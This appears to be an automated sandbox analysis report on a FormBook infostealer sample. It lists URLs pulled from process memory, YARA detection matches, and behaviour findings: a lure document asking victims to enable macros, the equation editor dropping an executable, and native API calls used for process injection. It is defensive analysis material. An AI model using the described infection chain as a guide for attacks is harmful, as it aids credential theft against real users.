Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2019/08/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2019/08/creative-portfolio-freelance/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2019/08/creative-portfolio-my-creative-cv/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2019/08/creative-portfolio-new-logo-concept/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2020/08/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2020/08/hello-world/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2020/08/hello-world/#comment-1
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/category/uncategorized/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/comments/feed/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/d41d8-about/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/d41d8-blog/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/d41d8-contact/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/d41d8-portfolio-single/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/d41d8-portfolio/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/feed/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/wp-json/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/wp-login.php
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/xmlrpc.php?rsd
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2192884231.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000002.2389413507.0000000000260000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://api.w.org/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/coblocks/dist/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/kioken-blocks/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/otter-blocks/v
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/themes/neve/assets/js/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/themes/neve/style.min.
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/uploads/2020/08/croppe
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/css/dist/block-librar
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/jquery.js?v
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/ui/core.min
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/ui/datepick
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/wp-embed.min.js?ve
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/wlwmanifest.xml?time=
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://themeisle.com/themes/neve/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://wordpress.org/

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: document is protected 17 18 19 20 21 Open the document m If INS documcn: was 22 Mkrosoft Offkc
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E91100 GetProcAddress,GetProcAddress,GetConsoleWindow,ShowWindow,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW, 4_2_00E91100
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419D60 NtCreateFile, 6_2_00419D60
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419E10 NtReadFile, 6_2_00419E10
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419E90 NtClose, 6_2_00419E90
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419F40 NtAllocateVirtualMemory, 6_2_00419F40
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419E0A NtReadFile, 6_2_00419E0A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419E8F NtClose, 6_2_00419E8F
Source: C:\Users\Public\vbc.exe Code function: 6_2_008500C4 NtCreateFile,LdrInitializeThunk, 6_2_008500C4
Source: C:\Users\Public\vbc.exe Code function: 6_2_00850048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_00850048
Source: C:\Users\Public\vbc.exe Code function: 6_2_00850078 NtResumeThread,LdrInitializeThunk, 6_2_00850078
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084F9F0 NtClose,LdrInitializeThunk, 6_2_0084F9F0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084F900 NtReadFile,LdrInitializeThunk, 6_2_0084F900
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_0084FAD0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_0084FAE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_0084FBB8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_0084FB68
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_0084FC90
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_0084FC60
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FD8C NtDelayExecution,LdrInitializeThunk, 6_2_0084FD8C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_0084FDC0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_0084FEA0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_0084FED0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FFB4 NtCreateSection,LdrInitializeThunk, 6_2_0084FFB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_008510D0 NtOpenProcessToken, 6_2_008510D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00850060 NtQuerySection, 6_2_00850060
Source: C:\Users\Public\vbc.exe Code function: 6_2_008501D4 NtSetValueKey, 6_2_008501D4
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085010C NtOpenDirectoryObject, 6_2_0085010C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00851148 NtOpenThread, 6_2_00851148
Source: C:\Users\Public\vbc.exe Code function: 6_2_008507AC NtCreateMutant, 6_2_008507AC
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084F8CC NtWaitForSingleObject, 6_2_0084F8CC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00851930 NtSetContextThread, 6_2_00851930
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084F938 NtWriteFile, 6_2_0084F938
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FAB8 NtQueryValueKey, 6_2_0084FAB8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FA20 NtQueryInformationFile, 6_2_0084FA20
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FA50 NtEnumerateValueKey, 6_2_0084FA50
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FBE8 NtQueryVirtualMemory, 6_2_0084FBE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FB50 NtCreateKey, 6_2_0084FB50
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FC30 NtOpenProcess, 6_2_0084FC30
Source: C:\Users\Public\vbc.exe Code function: 6_2_00850C40 NtGetContextThread, 6_2_00850C40
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FC48 NtSetInformationFile, 6_2_0084FC48
Source: C:\Users\Public\vbc.exe Code function: 6_2_00851D80 NtSuspendThread, 6_2_00851D80
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FD5C NtEnumerateKey, 6_2_0084FD5C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FE24 NtWriteVirtualMemory, 6_2_0084FE24
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FFFC NtCreateProcessEx, 6_2_0084FFFC
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FF34 NtQueueApcThread, 6_2_0084FF34
Source: C:\Users\Public\vbc.exe Code function: 6_2_00289862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 6_2_00289862
Source: C:\Users\Public\vbc.exe Code function: 6_2_00289DAE NtResumeThread,NtClose, 6_2_00289DAE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023300C4 NtCreateFile,LdrInitializeThunk, 9_2_023300C4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023307AC NtCreateMutant,LdrInitializeThunk, 9_2_023307AC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FAB8 NtQueryValueKey,LdrInitializeThunk, 9_2_0232FAB8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_0232FAE8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_0232FAD0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_0232FB68
